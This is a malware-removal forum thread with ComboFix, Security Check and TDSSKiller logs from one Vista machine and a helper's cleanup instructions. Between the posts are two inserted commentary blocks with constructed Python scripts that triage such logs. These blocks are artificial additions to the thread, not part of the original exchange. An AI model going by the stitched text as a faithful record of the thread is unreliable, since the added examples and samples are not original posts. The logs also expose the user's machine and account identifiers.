[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Aurigma]
@SACL=(02 0001)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software]
@SACL=(02 0001)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Conduit]
@SACL=(02 0001)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Unity]
@SACL=(02 0001)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\uTorrentControl]
@SACL=(02 0001)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo]
@SACL=(02 0001)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo\Companion\Profiles\!guest\bookmarks]
@SACL=(02 0001)
"lastact"=dword:00003640
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo\Companion\Profiles\!guest\ButtonHistory]
@SACL=(02 0001)
"srch_ebox"=dword:4785b178
"srch_hlt"=dword:47854ece
"clkstrm"=dword:4785b2dc
"boo"=dword:4785b2dc
"etpg70_21"=dword:47854ece
"sst"=dword:47854ecf
"mess"=dword:4785b2dc
"mess_off"=dword:4785b2dc
"yma"=dword:47854eda
"mus"=dword:47854edb
"wik"=dword:47854edb
"vis_srch70"=dword:4785abea
"cacheldr"=dword:4785b2dc
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo\Companion\Profiles\!guest\URLHistory]
@SACL=(02 0001)
"srch"=dword:4785abec
"vis_srch70"=dword:4785abec
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo\Companion\Profiles\simi_zenith05]
@SACL=(02 0001)
"LastPoll_200"=dword:00041537
"resfeed"=dword:00000002
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo\Companion\SearchHistory]
@SACL=(02 0001)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\CDDB]
@Denied: (Full) (RestrictedCode)
@Denied: (Full) (LocalSystem)
@Denied: (Full) (S-1-5-21-822561583-4103383742-3251873995-1000)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\ej-technologies]
@Denied: (Full) (RestrictedCode)
@Denied: (Full) (LocalSystem)
@Denied: (Full) (S-1-5-21-822561583-4103383742-3251873995-1000)
@Denied: (Full) (Administrators)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\ej-technologies\exe4j]
"InstallStarted"=dword:00000000
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\Microsoft\Windows\CurrentVersion\Uninstall\jlGui 3.0]
@Denied: (Full) (RestrictedCode)
@Denied: (Full) (LocalSystem)
@Denied: (Full) (S-1-5-21-822561583-4103383742-3251873995-1000)
@Denied: (Full) (Administrators)
"UninstallString"="c:\\Windows\\system32\\javaws.exe -uninstall -prompt \"http://www.javazoom.com/jlgui/jws/jlgui3.0.jarjnlp\""
"DisplayName"="jlGui 3.0"
"DisplayIcon"="c:\\Users\\GAGAN\\AppData\\LocalLow\\Sun\\Java\\Deployment\\cache\\6.0\\57\\573addb9-2492e35c.ico"
"NoModify"=dword:00000001
"NoRepair"=dword:00000001
"Publisher"="Music Player for the Java(tm) Platform"
"Comments"="jlGui supports MP3, OGG VORBIS, FLAC, SPEEX, WAV, AIFF, AU audio formats. It ..."
"URLInfoAbout"="http://www.javazoom.net"
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\Microsoft\Windows\CurrentVersion\Webcheck\Store.1]
@Denied: (Full) (LocalSystem)
@Denied: (Full) (S-1-5-21-822561583-4103383742-3251873995-1000)
@Denied: (Full) (Administrators)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\System\12a9d3cc-cd48-4c6b-a102-8b76a6f66e5a]
@Denied: (Full) (RestrictedCode)
@Denied: (Full) (LocalSystem)
@Denied: (Full) (S-1-5-21-822561583-4103383742-3251873995-1000)
@Denied: (Full) (Administrators)
"bgu0fw0tDZx8jtqEjccbDg==
"=hex:45,75,92,1a,9f,09,c9,e9,d6,46,18,dd,5c,30,38,
96
.
[HKEY_LOCAL_MACHINE\software\Classes\.hta]
@Denied: (Full) (Administrators)
@Denied: (Full) (Owner)
@Denied: (Full) (LocalSystem)
@Denied: (Full) (Administrators)
@Denied: (Full) (Users)
@SACL=
"PerceivedType"="text"
@="htafile"
"Content Type"="application/hta"
.
[HKEY_LOCAL_MACHINE\software\Classes\.hta\PersistentHandler]
@="{eec97550-47a9-11cf-b952-00aa0051fe20}"
.
[HKEY_LOCAL_MACHINE\system\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0000\AllUserSettings]
@Denied: (A) (Users)
@Denied: (A) (Everyone)
@Allowed: (B 1 2 3 4 5) (S-1-5-20)
"BlindDial"=dword:00000000
"MSCurrentCountry"=dword:000000b5
.
------------------------ Other Running Processes ------------------------
.
c:\program files\Microsoft Security Client\MsMpEng.exe
c:\windows\system32\Ati2evxx.exe
c:\windows\system32\Ati2evxx.exe
c:\windows\system32\agrsmsvc.exe
c:\program files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
c:\program files\Bonjour\mDNSResponder.exe
c:\windows\system32\spool\DRIVERS\W32X86\3\dldtserv.exe
c:\windows\system32\dldtcoms.exe
c:\program files\Giraffic\Veoh_GirafficWatchdog.exe
c:\progra~1\mcafee\SITEAD~1\mcsacore.exe
c:\program files\Common Files\Microsoft Shared\VS7Debug\mdm.exe
c:\toshiba\IVP\ISM\pinger.exe
c:\windows\System32\tcpsvcs.exe
c:\windows\system32\rundll32.exe
c:\program files\Alcohol Soft\Alcohol 52\StarWind\StarWindServiceAE.exe
c:\toshiba\IVP\swupdate\swupdtmr.exe
c:\program files\TeamViewer\Version6\TeamViewer_Service.exe
c:\program files\Toshiba\TOSHIBA DVD PLAYER\TNaviSrv.exe
c:\windows\system32\TODDSrv.exe
c:\program files\Toshiba\Power Saver\TosCoSrv.exe
c:\program files\Common Files\Ulead Systems\DVD\ULCDRSvr.exe
c:\program files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
c:\program files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
c:\program files\Giraffic\Veoh_Giraffic.exe
c:\program files\TeamViewer\Version6\TeamViewer.exe
c:\windows\RtHDVCpl.exe
c:\program files\Dell V305\dldtMsdMon.exe
c:\program files\Synaptics\SynTP\SynToshiba.exe
c:\program files\ATI Technologies\ATI.ACE\Core-Static\MOM.EXE
c:\program files\iPod\bin\iPodService.exe
c:\program files\Camera Assistant Software for Toshiba\CEC_MAIN.exe
c:\program files\Synaptics\SynTP\SynTPHelper.exe
c:\program files\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
c:\program files\Microsoft Security Client\MpCmdRun.exe
c:\program files\Microsoft Security Client\MpCmdRun.exe
c:\windows\servicing\TrustedInstaller.exe
.
**************************************************************************
.
Completion time: 2012-06-09 02:09:06 - machine was rebooted
ComboFix-quarantined-files.txt 2012-06-09 06:06
ComboFix2.txt 2012-05-30 04:16
ComboFix3.txt 2012-05-29 18:01
ComboFix4.txt 2012-05-29 02:55
.
Pre-Run: 46,873,288,704 bytes free
Post-Run: 46,246,096,896 bytes free
.
- - End Of File - - 64CCD60A89442B21471969895B93140D


----------



## gagraptor (May 23, 2012)

Results of screen317's Security Check version 0.99.41 
Windows Vista Service Pack 2 x86 (UAC is enabled) 
Internet Explorer 8 *Out of date!* 
*``````````````Antivirus/Firewall Check:``````````````* 
Windows Firewall Enabled! 
Microsoft Security Essentials 
(On Access scanning *disabled*!) 
*`````````Anti-malware/Other Utilities Check:`````````* 
McAfee SiteAdvisor 
Malwarebytes Anti-Malware version 1.61.0.1400 
TuneUp Companion 2.2.7 
CCleaner 
JavaFX 2.0.3 
JavaFX 2.0.2 SDK 
Java(TM) 6 Update 29 
Java(TM) 7 Update 3 
Java(TM) SE Runtime Environment 6 
Java(TM) SE Development Kit 7 Update 2 
*Java version out of date!* 
Adobe Flash Player 11.2.202.235 
Adobe Reader 8 *Adobe Reader out of date!* 
Mozilla Firefox 11.0 *Firefox out of Date!* 
Google Chrome 19.0.1084.46 
Google Chrome 19.0.1084.52 
*````````Process Check: objlist.exe by Laurent````````* 
Microsoft Security Essentials MSMpEng.exe 
Microsoft Security Essentials msseces.exe 
*`````````````````System Health check`````````````````* 
Total Fragmentation on Drive C: 0 % 
*````````````````````End of Log``````````````````````*


----------
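Security Check's report above is a plain inventory; the security-relevant reading is in the flags and in the duplicates. Two Java runtimes (6 Update 29 and 7 Update 3) and two Chrome builds are listed side by side, which means the older copy is still present on disk rather than replaced. The following is an added example, not code from this thread or from screen317's tool, that parses this report format into product/version records and reports both the explicit "out of date" markers and products installed more than once. The input excerpt is constructed for the example from the versions in the report above.

```python
import re

# Constructed excerpt in the format of screen317's Security Check report; the
# product lines and versions are copied from the report posted in this thread.
SAMPLE_REPORT = """\
*`````````Anti-malware/Other Utilities Check:`````````*
Malwarebytes Anti-Malware version 1.61.0.1400
JavaFX 2.0.3
JavaFX 2.0.2 SDK
Java(TM) 6 Update 29
Java(TM) 7 Update 3
Java(TM) SE Runtime Environment 6
Java(TM) SE Development Kit 7 Update 2
*Java version out of date!*
Adobe Flash Player 11.2.202.235
Adobe Reader 8 *Adobe Reader out of date!*
Mozilla Firefox 11.0 *Firefox out of Date!*
Google Chrome 19.0.1084.46
Google Chrome 19.0.1084.52
"""

# "<product> [version] <n[.n...]>[ Update <n>] <rest>"; section headers start with '*'
# and are skipped because the product part may not begin with '*', a digit or a backtick.
PRODUCT_LINE = re.compile(
    r"^(?P<product>[^\d*`]+?)(?: version)? (?P<version>\d[\d.]*(?: Update \d+)?)(?P<rest>.*)$"
)
# Both the trailing "*X out of date!*" marker and the standalone "*Java version out of date!*" line.
FLAG = re.compile(r"\*([^*]*out of date!)\*", re.IGNORECASE)


def parse_security_check(text):
    """Return (entries, flags): entries are dicts with product/version/flag,
    flags is every '*... out of date!*' marker in the order it appears."""
    entries, flags = [], []
    for line in text.splitlines():
        line = line.strip()
        flags.extend(FLAG.findall(line))
        m = PRODUCT_LINE.match(line)
        if m:
            entries.append({
                "product": m["product"].strip(),
                "version": m["version"],
                "flag": bool(FLAG.search(m["rest"])),
            })
    return entries, flags


def multiple_versions(entries):
    """Products listed with more than one version: the older copies are still
    installed alongside the newer one and need removing, not just updating."""
    seen = {}
    for e in entries:
        seen.setdefault(e["product"], []).append(e["version"])
    return {p: v for p, v in seen.items() if len(v) > 1}


def flagged_products(entries):
    """Products whose own line carries an out-of-date marker."""
    return [e["product"] for e in entries if e["flag"]]


if __name__ == "__main__":
    entries, flags = parse_security_check(SAMPLE_REPORT)
    print("flags:", flags)
    print("flagged products:", flagged_products(entries))
    print("installed more than once:", multiple_versions(entries))
```

The standalone Java marker is not tied to a single line in the report, which is why flags are collected separately from the per-product flag; the duplicate-version check is what tells you the 6 Update 29 runtime is still installed even after 7 Update 3 went on.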



## gagraptor (May 23, 2012)

The highest usage for memory is Windows Explorer 13692K
and Desktop Window Manager 13988K.
I have 2 GB of RAM.


----------



## gagraptor (May 23, 2012)

The next highest process is around 6000K something.


----------



## Mark1956 (May 7, 2011)

With only 2GB of RAM I would say your memory usage is about normal and nothing to be concerned with.

We have some updating to do, but please first proceed with these instructions, then post back and confirm it all went OK. I will be out for the rest of today so may not get back here until tomorrow morning, GMT+1.

Did you do the re-run with TDSSKiller? You have not posted the log.

Your system is now clean, as long as you have no further problems there are just a couple of things to do and we are finished.

To re-enable your CD Emulation drivers if you disabled them, double click *DeFogger.exe* to run the tool again.

The application window will appear.
Click the *Re-enable* button to re-enable your CD Emulation drivers.
Click *Yes* to continue.
A *'Finished!*' message will appear.
Click *OK*.
DeFogger will now ask to reboot the machine...click *OK*.
To uninstall ComboFix, press the *WINKEY + R* keys on your keyboard or click on Start, type *Run* into the search box and hit *Enter*.
In the *Run* box type: *ComboFix /Uninstall* (Be sure to leave a space before the forward slash).
Click on *OK*.
If you encounter any problems using the switch from the Run dialog box, just rename ComboFix.exe to *Uninstall.exe*, then double-click on it to remove.
This will delete ComboFix's related folders/files, reset the clock settings, hide file extensions/system files, clear the System Restore cache to prevent possible reinfection and *create a new Restore point.*
When it has finished you will see a dialog box stating that _"ComboFix has been uninstalled"._
After that, you can delete the ComboFix.exe program from your computer (Desktop).
*Next*

Download *OTC* by OldTimer and save it to your *desktop*.
Double click the OTC icon to start the program.
If you are using Vista or Windows 7, please right-click and choose *Run as Administrator*
Then click the big button.
You will get a prompt saying "_Begin Cleanup Process_". Please select *Yes*.
Restart your computer when prompted.
-- Doing this will *remove* any specialized tools downloaded and used. If OTC does not delete itself, then delete the file manually when done.
-- Any leftover folders/files related to ComboFix or other tools which OTC did not remove can be deleted manually (right-click on it and choose delete).
Please post back when this is complete and let me know if you have had any problems.


----------
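The TDSSKiller log Mark1956 asks for above lists every registered service and driver as a name/MD5/path line followed by a verdict line; a few entries (axsaki, Giraffic, blbdrive, COMSysApp and msiserver in the log posted below) get only the verdict line because the tool found no file for them. That alone is not a sign of infection, since stock Windows services appear the same way, but it is the kind of entry a responder reads twice. The following is an added example, not code from this thread or from Kaspersky, that parses lines in that format and produces a review list: entries with no file on disk, binaries outside the Windows and Program Files trees, and hashes that differ from a baseline. The sample log, the baseline dictionary and the `samplesvc` record are constructed for the example; the ACPI, Apple Mobile Device and McAfee SiteAdvisor lines are copied from the log in this thread.

```python
import re

# Constructed sample in the TDSSKiller 2.7.x line format that appears in this thread.
# The first three services copy real lines from the log below; "samplesvc" is a
# made-up record whose path and hash exist only to exercise the checks.
SAMPLE_LOG = r"""
13:26:34.0673 5964 ACPI (82b296ae1892fe3dbee00c9cf92f8ac7) C:\Windows\system32\drivers\acpi.sys
13:26:34.0673 5964 ACPI - ok
13:26:37.0387 5964 Apple Mobile Device (7ef47644b74ebe721cc32211d3c35e76) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
13:26:37.0387 5964 Apple Mobile Device - ok
13:26:39.0852 5964 axsaki - ok
13:27:00.0709 5964 McAfee SiteAdvisor Service (6c3d154fff0a97a6c3d9f78d60c41655) c:\PROGRA~1\mcafee\SITEAD~1\mcsacore.exe
13:27:00.0725 5964 McAfee SiteAdvisor Service - ok
13:27:09.0000 5964 samplesvc (0123456789abcdef0123456789abcdef) C:\Users\someone\AppData\Local\Temp\update.exe
13:27:09.0000 5964 samplesvc - ok
"""

# Hypothetical baseline: expected MD5 per service/driver name on a known-good
# machine of the same build. Only acpi.sys is populated here, with the hash from
# the thread's own log; a real baseline would come from a clean reference image.
BASELINE_MD5 = {"ACPI": "82b296ae1892fe3dbee00c9cf92f8ac7"}

# Where legitimately installed binaries live on this system (8.3 short names included,
# because TDSSKiller prints the ImagePath exactly as registered).
TRUSTED_ROOTS = ("c:\\windows\\", "c:\\program files", "c:\\progra~1\\", "c:\\progra~2\\")

# "<time> <pid> <name> (<md5>) <path>" and "<time> <pid> <name> - <verdict>";
# names may contain spaces, so the name group is lazy and anchored on what follows it.
HASH_LINE = re.compile(r"^\S+\s+\d+\s+(?P<name>.+?) \((?P<md5>[0-9a-f]{32})\) (?P<path>.+)$")
VERDICT_LINE = re.compile(r"^\S+\s+\d+\s+(?P<name>.+?) - (?P<verdict>.+)$")


def parse_tdsskiller(text):
    """Return {name: {"md5", "path", "verdict"}} in log order.
    Entries that only ever get a verdict line keep md5 and path as None."""
    records = {}
    for line in text.splitlines():
        m = HASH_LINE.match(line)
        if m:
            rec = records.setdefault(m["name"], {"md5": None, "path": None, "verdict": None})
            rec.update(md5=m["md5"], path=m["path"])
            continue
        m = VERDICT_LINE.match(line)
        if m:
            rec = records.setdefault(m["name"], {"md5": None, "path": None, "verdict": None})
            rec["verdict"] = m["verdict"]
    return records


def triage(records, baseline=BASELINE_MD5):
    """Return a list of (name, reason) findings worth a second look.
    This is a review list, not a verdict: stock services can legitimately have no file."""
    findings = []
    for name, rec in records.items():
        if rec["verdict"] and rec["verdict"] != "ok":
            findings.append((name, "tdsskiller verdict: " + rec["verdict"]))
        if rec["path"] is None:
            findings.append((name, "registered service/driver with no file on disk"))
            continue
        if not rec["path"].lower().startswith(TRUSTED_ROOTS):
            findings.append((name, "binary outside trusted roots: " + rec["path"]))
        expected = baseline.get(name)
        if expected and expected != rec["md5"]:
            findings.append((name, "md5 differs from baseline"))
    return findings


if __name__ == "__main__":
    for name, reason in triage(parse_tdsskiller(SAMPLE_LOG)):
        print(f"{name}: {reason}")
```

Run against a full log, the path check is the one that earns its keep: a service whose ImagePath sits under a user profile or a Temp directory is exactly how the kind of scheduled-task or service persistence behind a recurring mshta.exe launch tends to show up, and the hash comparison catches a system driver that has been replaced in place.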



## gagraptor (May 23, 2012)

13:26:25.0188 5568	TDSS rootkit removing tool 2.7.36.0 May 21 2012 16:40:16
13:26:25.0469 5568	============================================================
13:26:25.0469 5568	Current date / time: 2012/06/09 13:26:25.0469
13:26:25.0469 5568	SystemInfo:
13:26:25.0469 5568	
13:26:25.0469 5568	OS Version: 6.0.6002 ServicePack: 2.0
13:26:25.0469 5568	Product type: Workstation
13:26:25.0469 5568	ComputerName: GAGAN-PC
13:26:25.0469 5568	UserName: GAGAN
13:26:25.0469 5568	Windows directory: C:\Windows
13:26:25.0469 5568	System windows directory: C:\Windows
13:26:25.0469 5568	Processor architecture: Intel x86
13:26:25.0469 5568	Number of processors: 2
13:26:25.0469 5568	Page size: 0x1000
13:26:25.0469 5568	Boot type: Normal boot
13:26:25.0469 5568	============================================================
13:26:29.0213 5568	Drive \Device\Harddisk0\DR0 - Size: 0x3A38B2E000 (232.89 Gb), SectorSize: 0x200, Cylinders: 0x76C1, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000050
13:26:29.0213 5568	============================================================
13:26:29.0213 5568	\Device\Harddisk0\DR0:
13:26:29.0213 5568	MBR partitions:
13:26:29.0213 5568	\Device\Harddisk0\DR0\Partition0: MBR, Type 0x7, StartLBA 0x2EE800, BlocksNum 0x1CED7000
13:26:29.0213 5568	============================================================
13:26:29.0259 5568	C: <-> \Device\Harddisk0\DR0\Partition0
13:26:29.0259 5568	============================================================
13:26:29.0259 5568	Initialize success
13:26:29.0259 5568	============================================================
13:26:32.0005 5964	============================================================
13:26:32.0005 5964	Scan started
13:26:32.0005 5964	Mode: Manual; 
13:26:32.0005 5964	============================================================
13:26:34.0673 5964	ACPI (82b296ae1892fe3dbee00c9cf92f8ac7) C:\Windows\system32\drivers\acpi.sys
13:26:34.0673 5964	ACPI - ok
13:26:35.0250 5964	AdobeFlashPlayerUpdateSvc (76d5a3d2a50402a0b9b6ed13c4371e79) C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
13:26:35.0250 5964	AdobeFlashPlayerUpdateSvc - ok
13:26:35.0343 5964	adp94xx (2edc5bbac6c651ece337bde8ed97c9fb) C:\Windows\system32\drivers\adp94xx.sys
13:26:35.0375 5964	adp94xx - ok
13:26:35.0421 5964	adpahci (b84088ca3cdca97da44a984c6ce1ccad) C:\Windows\system32\drivers\adpahci.sys
13:26:35.0437 5964	adpahci - ok
13:26:35.0468 5964	adpu160m (7880c67bccc27c86fd05aa2afb5ea469) C:\Windows\system32\drivers\adpu160m.sys
13:26:35.0468 5964	adpu160m - ok
13:26:35.0499 5964	adpu320 (9ae713f8e30efc2abccd84904333df4d) C:\Windows\system32\drivers\adpu320.sys
13:26:35.0499 5964	adpu320 - ok
13:26:35.0562 5964	AeLookupSvc (9d1fda9e086ba64e3c93c9de32461bcf) C:\Windows\System32\aelupsvc.dll
13:26:35.0562 5964	AeLookupSvc - ok
13:26:35.0687 5964	AFD (3911b972b55fea0478476b2e777b29fa) C:\Windows\system32\drivers\afd.sys
13:26:35.0702 5964	AFD - ok
13:26:35.0718 5964	AgereModemAudio (39e435c90c9c4f780fa0ed05ca3c3a1b) C:\Windows\system32\agrsmsvc.exe
13:26:35.0718 5964	AgereModemAudio - ok
13:26:36.0404 5964	AgereSoftModem (ce91b158fa490cf4c4d487a4130f4660) C:\Windows\system32\DRIVERS\AGRSM.sys
13:26:36.0451 5964	AgereSoftModem - ok
13:26:36.0513 5964	agp440 (ef23439cdd587f64c2c1b8825cead7d8) C:\Windows\system32\drivers\agp440.sys
13:26:36.0513 5964	agp440 - ok
13:26:36.0576 5964	aic78xx (ae1fdf7bf7bb6c6a70f67699d880592a) C:\Windows\system32\drivers\djsvs.sys
13:26:36.0591 5964	aic78xx - ok
13:26:36.0638 5964	ALG (a1545b731579895d8cc44fc0481c1192) C:\Windows\System32\alg.exe
13:26:36.0638 5964	ALG - ok
13:26:36.0669 5964	aliide (90395b64600ebb4552e26e178c94b2e4) C:\Windows\system32\drivers\aliide.sys
13:26:36.0669 5964	aliide - ok
13:26:36.0685 5964	amdagp (2b13e304c9dfdfa5eb582f6a149fa2c7) C:\Windows\system32\drivers\amdagp.sys
13:26:36.0685 5964	amdagp - ok
13:26:36.0716 5964	amdide (0577df1d323fe75a739c787893d300ea) C:\Windows\system32\drivers\amdide.sys
13:26:36.0716 5964	amdide - ok
13:26:36.0732 5964	AmdK7 (dc487885bcef9f28eece6fac0e5ddfc5) C:\Windows\system32\drivers\amdk7.sys
13:26:36.0747 5964	AmdK7 - ok
13:26:36.0794 5964	AmdK8 (93ae7f7dd54ab986a6f1a1b37be7442d) C:\Windows\system32\DRIVERS\amdk8.sys
13:26:36.0794 5964	AmdK8 - ok
13:26:36.0857 5964	ApfiltrService (7c2f57bce81fa74933f0e1c84a97c9db) C:\Windows\system32\DRIVERS\Apfiltr.sys
13:26:36.0857 5964	ApfiltrService - ok
13:26:37.0075 5964	AppHostSvc (dfae18c675d71fd06d57dc69d2913975) C:\Windows\system32\inetsrv\apphostsvc.dll
13:26:37.0106 5964	AppHostSvc - ok
13:26:37.0215 5964	Appinfo (c6d704c7f0434dc791aac37cac4b6e14) C:\Windows\System32\appinfo.dll
13:26:37.0215 5964	Appinfo - ok
13:26:37.0387 5964	Apple Mobile Device (7ef47644b74ebe721cc32211d3c35e76) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
13:26:37.0387 5964	Apple Mobile Device - ok
13:26:37.0465 5964	arc (5f673180268bb1fdb69c99b6619fe379) C:\Windows\system32\drivers\arc.sys
13:26:37.0496 5964	arc - ok
13:26:37.0527 5964	arcsas (957f7540b5e7f602e44648c7de5a1c05) C:\Windows\system32\drivers\arcsas.sys
13:26:37.0527 5964	arcsas - ok
13:26:37.0761 5964	AsyncMac (53b202abee6455406254444303e87be1) C:\Windows\system32\DRIVERS\asyncmac.sys
13:26:37.0761 5964	AsyncMac - ok
13:26:37.0839 5964	atapi (1f05b78ab91c9075565a9d8a4b880bc4) C:\Windows\system32\drivers\atapi.sys
13:26:37.0839 5964	atapi - ok
13:26:37.0964 5964	athr (8be56f8300e1c37b578da23c71816b7a) C:\Windows\system32\DRIVERS\athr.sys
13:26:37.0995 5964	athr - ok
13:26:38.0167 5964	Ati External Event Utility (59991b5ec50e106634a16444594c305e) C:\Windows\system32\Ati2evxx.exe
13:26:38.0198 5964	Ati External Event Utility - ok
13:26:38.0807 5964	atikmdag (fab37c8e4b55235de9055026561dcc7f) C:\Windows\system32\DRIVERS\atikmdag.sys
13:26:38.0822 5964	atikmdag - ok
13:26:39.0415 5964	AudioEndpointBuilder (68e2a1a0407a66cf50da0300852424ab) C:\Windows\System32\Audiosrv.dll
13:26:39.0431 5964	AudioEndpointBuilder - ok
13:26:39.0446 5964	Audiosrv (68e2a1a0407a66cf50da0300852424ab) C:\Windows\System32\Audiosrv.dll
13:26:39.0446 5964	Audiosrv - ok
13:26:39.0852 5964	axsaki - ok
13:26:39.0945 5964	Beep (67e506b75bd5326a3ec7b70bd014dfb6) C:\Windows\system32\drivers\Beep.sys
13:26:39.0945 5964	Beep - ok
13:26:40.0257 5964	BFE (c789af0f724fda5852fb9a7d3a432381) C:\Windows\System32\bfe.dll
13:26:40.0273 5964	BFE - ok
13:26:40.0445 5964	BITS (93952506c6d67330367f7e7934b6a02f) C:\Windows\system32\qmgr.dll
13:26:40.0476 5964	BITS - ok
13:26:40.0476 5964	blbdrive - ok
13:26:40.0788 5964	Bonjour Service (db5bea73edaf19ac68b2c0fad0f92b1a) C:\Program Files\Bonjour\mDNSResponder.exe
13:26:40.0803 5964	Bonjour Service - ok
13:26:40.0913 5964	bowser (35f376253f687bde63976ccb3f2108ca) C:\Windows\system32\DRIVERS\bowser.sys
13:26:40.0928 5964	bowser - ok
13:26:40.0959 5964	BrFiltLo (9f9acc7f7ccde8a15c282d3f88b43309) C:\Windows\system32\drivers\brfiltlo.sys
13:26:40.0959 5964	BrFiltLo - ok
13:26:40.0991 5964	BrFiltUp (56801ad62213a41f6497f96dee83755a) C:\Windows\system32\drivers\brfiltup.sys
13:26:40.0991 5964	BrFiltUp - ok
13:26:41.0022 5964	Browser (a3629a0c4226f9e9c72faaeebc3ad33c) C:\Windows\System32\browser.dll
13:26:41.0037 5964	Browser - ok
13:26:41.0069 5964	Brserid (b304e75cff293029eddf094246747113) C:\Windows\system32\drivers\brserid.sys
13:26:41.0069 5964	Brserid - ok
13:26:41.0084 5964	BrSerWdm (203f0b1e73adadbbb7b7b1fabd901f6b) C:\Windows\system32\drivers\brserwdm.sys
13:26:41.0084 5964	BrSerWdm - ok
13:26:41.0115 5964	BrUsbMdm (bd456606156ba17e60a04e18016ae54b) C:\Windows\system32\drivers\brusbmdm.sys
13:26:41.0115 5964	BrUsbMdm - ok
13:26:41.0131 5964	BrUsbSer (af72ed54503f717a43268b3cc5faec2e) C:\Windows\system32\drivers\brusbser.sys
13:26:41.0131 5964	BrUsbSer - ok
13:26:41.0147 5964	BTHMODEM (ad07c1ec6665b8b35741ab91200c6b68) C:\Windows\system32\drivers\bthmodem.sys
13:26:41.0147 5964	BTHMODEM - ok
13:26:41.0225 5964	BVRPMPR5 (248dfa5762dde38dfddbbd44149e9d7a) C:\Windows\system32\drivers\BVRPMPR5.SYS
13:26:41.0225 5964	BVRPMPR5 - ok
13:26:41.0256 5964	catchme - ok
13:26:41.0412 5964	cdfs (7add03e75beb9e6dd102c3081d29840a) C:\Windows\system32\DRIVERS\cdfs.sys
13:26:41.0427 5964	cdfs - ok
13:26:41.0615 5964	cdrom (6b4bffb9becd728097024276430db314) C:\Windows\system32\DRIVERS\cdrom.sys
13:26:41.0630 5964	cdrom - ok
13:26:41.0739 5964	CertPropSvc (312ec3e37a0a1f2006534913e37b4423) C:\Windows\System32\certprop.dll
13:26:41.0739 5964	CertPropSvc - ok
13:26:41.0786 5964	circlass (da8e0afc7baa226c538ef53ac2f90897) C:\Windows\system32\drivers\circlass.sys
13:26:41.0786 5964	circlass - ok
13:26:41.0849 5964	CLFS (d7659d3b5b92c31e84e53c1431f35132) C:\Windows\system32\CLFS.sys
13:26:41.0864 5964	CLFS - ok
13:26:42.0348 5964	clr_optimization_v2.0.50727_32 (8ee772032e2fe80a924f3b8dd5082194) C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
13:26:42.0363 5964	clr_optimization_v2.0.50727_32 - ok
13:26:42.0519 5964	clr_optimization_v4.0.30319_32 (c5a75eb48e2344abdc162bda79e16841) C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
13:26:42.0535 5964	clr_optimization_v4.0.30319_32 - ok
13:26:42.0613 5964	CmBatt (99afc3795b58cc478fbbbcdc658fcb56) C:\Windows\system32\DRIVERS\CmBatt.sys
13:26:42.0644 5964	CmBatt - ok
13:26:42.0660 5964	cmdide (45201046c776ffdaf3fc8a0029c581c8) C:\Windows\system32\drivers\cmdide.sys
13:26:42.0660 5964	cmdide - ok
13:26:42.0722 5964	Compbatt (6afef0b60fa25de07c0968983ee4f60a) C:\Windows\system32\DRIVERS\compbatt.sys
13:26:42.0722 5964	Compbatt - ok
13:26:42.0738 5964	COMSysApp - ok
13:26:42.0769 5964	crcdisk (2a213ae086bbec5e937553c7d9a2b22c) C:\Windows\system32\drivers\crcdisk.sys
13:26:42.0769 5964	crcdisk - ok
13:26:42.0785 5964	Crusoe (22a7f883508176489f559ee745b5bf5d) C:\Windows\system32\drivers\crusoe.sys
13:26:42.0800 5964	Crusoe - ok
13:26:42.0878 5964	CryptSvc (fb27772beaf8e1d28ccd825c09da939b) C:\Windows\system32\cryptsvc.dll
13:26:42.0878 5964	CryptSvc - ok
13:26:43.0487 5964	DcomLaunch (3b5b4d53fec14f7476ca29a20cc31ac9) C:\Windows\system32\rpcss.dll
13:26:43.0533 5964	DcomLaunch - ok
13:26:43.0596 5964	DfsC (622c41a07ca7e6dd91770f50d532cb6c) C:\Windows\system32\Drivers\dfsc.sys
13:26:43.0596 5964	DfsC - ok
13:26:44.0516 5964	DFSR (2cc3dcfb533a1035b13dcab6160ab38b) C:\Windows\system32\DFSR.exe
13:26:44.0641 5964	DFSR - ok
13:26:45.0405 5964	Dhcp (9028559c132146fb75eb7acf384b086a) C:\Windows\System32\dhcpcsvc.dll
13:26:45.0405 5964	Dhcp - ok
13:26:45.0515 5964	disk (5d4aefc3386920236a548271f8f1af6a) C:\Windows\system32\drivers\disk.sys
13:26:45.0530 5964	disk - ok
